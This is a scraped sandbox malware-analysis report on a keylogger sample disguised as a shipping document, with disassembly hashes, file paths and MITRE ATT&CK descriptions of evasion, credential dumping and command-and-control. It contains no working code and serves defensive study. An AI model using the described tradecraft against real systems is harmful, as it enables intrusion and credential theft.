Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ad7fa56d226d2826611feaca9e5bff7895db0a0189d85696b4e5a6def9836cd
Instruction ID: 510ed6364b70c71653e313f8a1b0c9e84bf4d0f11030955d654f7da786148ed8
Opcode Fuzzy Hash: 0ad7fa56d226d2826611feaca9e5bff7895db0a0189d85696b4e5a6def9836cd
Instruction Fuzzy Hash: 7CF0F631700A104B8B176A3E9854A2AB6DEEFC8AD53054079EA0BC7365EF20CC038390

Function 02FE28A2 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0166c16f97b6c817d3af4506eec8c86e453390ca227303e0beebff4fc705c8b1
Instruction ID: 996a92d12f5d083e3094100bac3ed25641fa1d8a30884a0929ea38c079fe233b
Opcode Fuzzy Hash: 0166c16f97b6c817d3af4506eec8c86e453390ca227303e0beebff4fc705c8b1
Instruction Fuzzy Hash: 96E0DF32E15326CBCB01EBF0EC100EFB734AE82221B49865BC0A437190EB306219C7A2

Function 02FE6739 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b32a1f8f4130585dbb0988a0bdae9df688154835927f46d42b6a32f2860838bd
Instruction ID: f3623aab031b3bd3be7644a869c5f2e276f4f168c462537d9cec04690f64e6ed
Opcode Fuzzy Hash: b32a1f8f4130585dbb0988a0bdae9df688154835927f46d42b6a32f2860838bd
Instruction Fuzzy Hash: D3E0C2318083490ECB53B738EE1D1247F3BDA612007944A79D0068E76BEF68CC8A4750

Function 02FE28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83759f0ec8055dcd7620f095b159c5f1eacd090e2d93acd3ccde7898c74582f8
Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
Opcode Fuzzy Hash: 83759f0ec8055dcd7620f095b159c5f1eacd090e2d93acd3ccde7898c74582f8
Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

Function 02FED6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 354eff9dc01a5d0089bafb61706001d6931c03cbb13e569239b2b74d96a72329
Instruction ID: 0e7b8fd87b0d176c11c0fd6be942f8dada189d31d08d20efa4bf8e3b2ef5cc5e
Opcode Fuzzy Hash: 354eff9dc01a5d0089bafb61706001d6931c03cbb13e569239b2b74d96a72329
Instruction Fuzzy Hash: BED0E235E0020CCBCF21EFA8E4844DDBB71EB48321B10502AD926A3212C6345450CF41

Function 02FEAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 820ae64f44077fda13a7098325786a153fbb9d488c7e31faf5276809422943bc
Instruction ID: e2acb9ee91099ef18ff735d8c9a41ff0cf4eb1926a2dbd75f7525f26905734ae
Opcode Fuzzy Hash: 820ae64f44077fda13a7098325786a153fbb9d488c7e31faf5276809422943bc
Instruction Fuzzy Hash: E6D0673AB41018DFCB149F99E8408DDF7B6FB98221B148116E915A3265C631A925DB64

Function 02FE6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77e30d7a6680b8900c4a677d28f30bab4b6cc8425c3359d69e5fe808988e68c7
Instruction ID: f547506f3d5502d8871053fd1329b9e694e468c2b0654b2073fae7d662dfa8c1
Opcode Fuzzy Hash: 77e30d7a6680b8900c4a677d28f30bab4b6cc8425c3359d69e5fe808988e68c7
Instruction Fuzzy Hash: 92C012300443094EC641F766ED45555776EE7A0600750863490050A75DDF78ACCA4694

Non-executed Functions

Function 06F824C8 Relevance: 1.9, Strings: 1, Instructions: 609COMMON

Download Yara Rule

Strings

.5vq, xrefs: 06F825F3

Memory Dump Source

Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: .5vq
API String ID: 0-493797296
Opcode ID: 67c90f3ce8b4d7b7da490b7207d2f8d2b63cb9d7c7edc840c2086fc4979314f8
Instruction ID: 6408d880b564c3465a2d4f0cb3e3f949726f96de86999ad1f8bab77f086922b0
Opcode Fuzzy Hash: 67c90f3ce8b4d7b7da490b7207d2f8d2b63cb9d7c7edc840c2086fc4979314f8
Instruction Fuzzy Hash: 60628D74E01229CFDB64DF69C984B9DBBB2BB89300F1085E9D409A7354DB35AE85CF50

Function 06F8F580 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24fc63212cfb9bdf04cc1e9e4715d8d265d86c321b4b621b62bf6ef1fbf0f7dc
Instruction ID: 631cb2af8fa4ee57a85f46f366613f0ab57c26dbfca86687df93237ed7ca82af
Opcode Fuzzy Hash: 24fc63212cfb9bdf04cc1e9e4715d8d265d86c321b4b621b62bf6ef1fbf0f7dc
Instruction Fuzzy Hash: 2CC17D74E01218CFDB54DFA5C994B9DBBB2BF89300F2481A9D809AB364DB359E85CF50

Function 06F8F128 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30be510c567efe48cb348967758e0a64a1bdf5d60a884f8a595d2b226cc3c587
Instruction ID: 2e2ee236e593b2244ad1b1ff9215e05f8f2e32a7cef78a0a772e52207dbd11f2
Opcode Fuzzy Hash: 30be510c567efe48cb348967758e0a64a1bdf5d60a884f8a595d2b226cc3c587
Instruction Fuzzy Hash: 2EC18F74E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB365DB359E85CF50

Function 06F8F9D8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07b67adeb95b6c755fd207234f0c982b403271818beb205ab97751deded62732
Instruction ID: 9f6df621f6f335f7000a16b892ee11623808afcbe99088ec167092ec16816949
Opcode Fuzzy Hash: 07b67adeb95b6c755fd207234f0c982b403271818beb205ab97751deded62732
Instruction Fuzzy Hash: 11C18E74E01218CFDB54DFA5C994B9DBBB2AF89300F2081A9D809AB365DB359E85CF50

Function 06F82B0B Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cecf46424649343442d26dfea720f49671d29330a44d3724112c9d76a5fa48e
Instruction ID: e4c7f9ad6297a926aa66e36f83d8a90037e72d3deb031be7f5ca94e4b6451a89
Opcode Fuzzy Hash: 9cecf46424649343442d26dfea720f49671d29330a44d3724112c9d76a5fa48e
Instruction Fuzzy Hash: A1A18B74A01229CFDB65DF24C994B9ABBB2BF4A300F5085EAD40DA7350DB35AE81CF51

Function 06F82CEB Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 391fc1770c23a75e396de578ff4f6775b41ca3acecaecf5a8238dc18574dd4d0
Instruction ID: b5ce1fb104c58fe7fc9c92fa4de0636167c93f4062459c5feac6c9c31b6e0c24
Opcode Fuzzy Hash: 391fc1770c23a75e396de578ff4f6775b41ca3acecaecf5a8238dc18574dd4d0
Instruction Fuzzy Hash: EE519274A01229CFCB65DF24C994B99BBB2FF49301F5085EAD40AA7350DB35AE81CF51

Function 02FE6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 02FE695E
\;^q, xrefs: 02FE6936
\;^q, xrefs: 02FE692C
\;^q, xrefs: 02FE6952

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: 2af3ef0980c6da25ddb741617409720a33641dd2780bf16f20abfd4ecde549b2
Instruction ID: eac3cc1a84da2dbb22483cac21a205656304a305653561dd37229b2fbb5ff543
Opcode Fuzzy Hash: 2af3ef0980c6da25ddb741617409720a33641dd2780bf16f20abfd4ecde549b2
Instruction Fuzzy Hash: 9D019E32B401088F8F298E2CC564A2D33EEABB8AA07154469E647CF3B4DA21DC41C750

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4yzgacq.uze.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1xyklf3.dpw.ps1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Windows Analysis Report
HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Function 07748A10 Relevance: 4.2, Strings: 3, Instructions: 418
COMMON

Function 07746521 Relevance: 4.1, Strings: 3, Instructions: 335
COMMON

Function 07748B28 Relevance: 4.0, Strings: 3, Instructions: 284
COMMON

Function 0774654D Relevance: 4.0, Strings: 3, Instructions: 273
COMMON

Function 077465C0 Relevance: 4.0, Strings: 3, Instructions: 219
COMMON

Function 0774F408 Relevance: 2.7, Strings: 2, Instructions: 226
COMMON

Function 0774F418 Relevance: 2.7, Strings: 2, Instructions: 224
COMMON

Function 05C3AD88 Relevance: 6.6, Strings: 5, Instructions: 318
COMMON

Function 079AA238 Relevance: 2.0, APIs: 1, Instructions: 510
COMMON

Function 079AA74C Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Function 079AA758 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 027FB2E0 Relevance: 1.7, APIs: 1, Instructions: 202
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre